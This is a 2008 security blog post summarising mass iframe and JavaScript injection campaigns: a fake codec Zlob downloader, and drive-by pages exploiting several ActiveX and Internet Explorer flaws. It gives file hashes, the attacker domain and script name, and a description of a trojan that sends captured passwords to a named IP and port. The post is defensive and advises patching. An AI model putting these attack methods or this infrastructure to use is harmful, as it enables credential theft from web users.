Attack of the Killer iframes and the javascript infections

At the beginning of the week, we saw an uprise in iframe attacks. Now at the end of the week, it's time to review the entire story. It's hard to have missed all the different blogs and securitycenters reporting on it. Among the better known website, Trendmicro joined the ranks of the victims.

1. The first iframe attacks lead to new site which enticed the used to install a new codec. A video provided by Avertlabs shows what an enduser would see.


March 2008 - Mass Hack Demo from Schmooog on Vimeo.
--

Scanner results : 22% Scanner(8/36) found malware!

File Name : democodec1292.exe

File Size : 74823 byte
MD5 :30965fdbd893990dd24abda2285d9edc
SHA1 : 53eacbb9cdf42394bd455d9bd2275f05730332f7

Downloader.Zlob.ZV; Trojan-Downloader.Win32.Zlob.eie; TrojanDownloader.Zlob.epx

As you can see, initial AV detection was not really good. But these needed user interaction to execute the code.

2. Another wave of MASSIVE webbased infection started this week as a javascript was injected into websites and led visitors to a malicious website hosted on 2117966.net. For this one, user interaction was not needed and the site tries to exploit several vulnerabilities.

Two days ago, The Register talked of almost 23.000 infections. Just doing a google search for "script src http www.2117966.net fuckjp.js" reveals it's about 24.500 now. I advise you not to click through to those sites.

The malicious websites attempt to exploit the vulnerability described in MS06-014 MS07-004, MS06-067, MS06-057 and a number of ActiveX vulnerabilities:

• Baofeng Storm ActiveX
• Ourgame GLChat ActiveX
• Microsoft Internet Explorer VML (VU#122084)
  
• Qvod Player ActiveX
• Microsoft RDS.Dataspace ActiveX (VU#234812)
  
• RealPlayer playlist ActiveX (VU#871673)
  
• Storm Player ActiveX
• Microsoft Windows WebViewFolderIcon ActiveX (VU#753044)
  
• Xunlei Thunder DapPlayer ActiveX

Shadowserver.org has some more information about how the Trojan works:

The trojan does not appear to do anything at all and makes no outbound connections if your machine is idle. However, if Internet Explorer is launched and makes a POST request involving an password field, the the trojan will spring into action sending encrypted traffic to another server in China. The trojan appears to specifically look for password input tags (< type="password ">). It does not appear to send off POST data unless there is a password input tag. If it detects a qualifying POST request it will immediately begin sending encrypted traffic to a Chinese server at 61.188.39.175 on port 2034. It does not appear to be using DNS to find this IP address.

Malware Binary:

File MD5: dca9063dd1f1f5dfc4c313f0136114c2
File Size: 69632 bytes

Malware DLL:

File MD5: d24d9c46a79ba36d742a1f0b61ed9cc8
File Size: 45056 bytes

So you may have noticed that it pointed to a server in China. Hmmmm...... also the name of the script was fuckjp.js and we can guess what JP stand for. When looking for some information on the script, I found this piece through TheDarkVisitor from the K'LLER blog :

After Analyzing the script I remembered that these kind of scripts are created by using some Web attckers toolkit like MPack, FirePack, IcePack , WPack or AnnyPack in which just you have to feed some info like payload and place it to compromised webserver or newone. But in this case the it is VIP 2.74 from Chinese Hackers. Latest Version is 2.842.

No matter who the wielder and what the origin of this malware is, take the necessary steps to protect yourself. So make sure you install all your patches and try to avoid the use of ActiveX or Java or use some mitigating factors such as KillBits or Noscript. Corporate networks might want to block traffic to www.21179 66.net.

Some previous articles:

• Lock down ActiveX with Kill Bit
• Security update for Firefox and how to do an enterprise rollout
• Free utility to scan for missing security patches